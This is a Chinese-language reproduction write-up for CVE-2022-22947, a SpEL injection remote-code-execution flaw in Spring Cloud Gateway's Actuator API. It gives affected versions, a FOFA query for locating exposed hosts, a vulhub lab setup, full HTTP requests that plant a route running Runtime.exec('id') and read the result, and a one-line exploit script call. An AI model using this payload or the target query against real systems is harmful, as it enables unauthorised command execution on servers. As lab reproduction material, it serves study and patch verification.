0x01 介绍
Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。
0x02 漏洞描述
Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。
0x03 漏洞影响
3.1.0、 3.0.0至3.0.6、 3.0.0之前的版本
0x04 FOFA语言
app="vmware-SpringBoot-framework"
0x05 漏洞环境搭建
docker-compose up -d
这里使用docker环境
https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947
下载对应的环境,使用docker-compose快速构建
docker-compose up -d
搭建成功后访问http://IP:8080
0x06 漏洞复现
网站是长这个样子的
1.添加包含恶意的路由
发送如下数据包即可添加一个包含恶意SpEL表达式的路由:
POST /actuator/gateway/routes/WeianSec HTTP/1.1
Host: 10.108.0.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 329
{
"id": "WeianSec",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
2.刷新网关路由
然后,发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行:
POST /actuator/gateway/refresh HTTP/1.1
Host: 10.108.0.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 523
Upgrade-Insecure-Requests=1&User-Agent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F98.0.4758.102+Safari%2F537.36&Accept=text%2Fhtml%2Capplication%2Fxhtml%2Bxml%2Capplication%2Fxml%3Bq%3D0.9%2Cimage%2Favif%2Cimage%2Fwebp%2Cimage%2Fapng%2C%2A%2F%2A%3Bq%3D0.8%2Capplication%2Fsigned-exchange%3Bv%3Db3%3Bq%3D0.9&Accept-Encoding=gzip%2C+deflate&Accept-Language=zh-CN%2Czh%3Bq%3D0.9&Connection=close&Content-Type=application%2Fx-www-form-urlencoded&Content-Length=0
3.执行命令
发送如下数据包即可查看执行结果:
GET /actuator/gateway/routes/WeianSec HTTP/1.1
Host: 10.108.0.52:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Edg/98.0.1108.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
4.脚本一键梭哈
python3 CVE-2022-22947.py -u http://10.108.0.52:8080 -x id
0x07 参考文章
https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md
https://mp.weixin.qq.com/s/5ZBpVTofGpG_ssz2iPeI2A